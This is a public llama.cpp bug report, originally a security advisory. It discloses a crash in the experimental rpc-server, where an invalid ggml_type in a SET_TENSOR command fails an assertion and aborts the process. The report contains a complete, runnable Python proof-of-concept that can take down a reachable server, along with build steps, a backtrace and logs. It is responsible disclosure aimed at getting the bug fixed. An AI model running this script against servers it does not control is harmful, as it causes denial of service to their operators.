Name and Version
$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0
Operating systems
Mac
Which llama.cpp modules do you know to be affected?
Other (Please specify in the next section)
Command line
./build/bin/rpc-server -p 50052
Problem description & steps to reproduce
Description
NOTE: This was originally reported as a security advisory. After discussion with the maintainers, it has now been disclosed as a public issue, since the RPC server is still an experimental feature (see the RPC example).
The rpc-server crashes when processing an RPC_CMD_SET_TENSOR command if the provided data contains an invalid ggml_type value within the rpc_tensor structure. The server doesn't validate the type field read from the network before using it internally. This leads to a failed assertion (GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)) during tensor deserialization (likely in ggml_new_tensor_4d), causing the server process to abort().
Expected Behavior
The server should validate the ggml_type read from the SET_TENSOR data before passing it to GGML functions. If the type is invalid, the server should:
- Log an error message indicating invalid input.
- Reject the command (e.g., send an error response or simply close the connection).
- Continue running without crashing.
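The three points above amount to a bounds check before the type value is ever handed to GGML. A minimal sketch of that logic, in Python purely for illustration (the real fix would live in the C++ rpc_server::deserialize_tensor, and the GGML_TYPE_COUNT value here is a stand-in for the constant from the ggml headers):

```python
GGML_TYPE_COUNT = 39  # stand-in; the real constant comes from the ggml headers


def checked_tensor_type(raw_type: int) -> int:
    """Validate an attacker-controlled type field before using it."""
    if not (0 <= raw_type < GGML_TYPE_COUNT):
        # Log and reject the command instead of letting GGML_ASSERT abort()
        # the whole server process.
        raise ValueError(f"rpc_tensor has invalid ggml_type {raw_type}")
    return raw_type
```

On the server side, the equivalent check would send an error response or close the connection rather than raise, so the process keeps serving other clients.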
Actual Behavior
The server reads the invalid ggml_type (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT checking the type validity fails, causing the server process to terminate via abort(). The client typically sees the connection break unexpectedly.
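For context on where the 65 comes from: 'A' is byte value 0x41 = 65, so a payload of repeated 'A's yields an out-of-range type however wide the field is read (the field widths below are illustrative, not taken from the rpc_tensor definition):

```python
import struct

payload = b"A" * 16  # the PoC fills the rpc_tensor bytes with 'A'

# Read as a single byte, 'A' is 65 -- the invalid type mentioned above.
print(payload[0])                           # 65
# Read as a little-endian uint32, it is still far outside any valid range.
print(struct.unpack("<I", payload[:4])[0])  # 1094795585 (0x41414141)
```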
Steps to Reproduce
- Clone the repository:
  git clone git@github.com:ggml-org/llama.cpp.git && cd llama.cpp
- Build the rpc-server binary:
  cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
- Run the server from the build directory:
  ./bin/rpc-server -p 50052
- Run the Python Proof of Concept script below (save as poc_rpc_crash.py):
  python poc_rpc_crash.py
import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024  # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE  # Value for the internal size field
CHUNK_SIZE = 1024  # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()
    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")
        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)
        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                raise ValueError("HELLO response size is zero.")
        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)
        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)
        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)
        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")
        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")
        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
            raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return  # Exit gracefully
        except OSError as e:
            # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return  # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
        print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)
    run_exploit_native(target_host, target_port)
Debugger backtrace to confirm crash:
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
frame #9: 0x0000000100003214 rpc-server`main + 3012
frame #10: 0x0000000198dfeb4c dyld`start + 6000
First Bad Commit
Relevant log output
Starting RPC server v1.0.0
endpoint : 127.0.0.1:50052
local cache : n/a
backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1] 61001 abort ./bin/rpc-server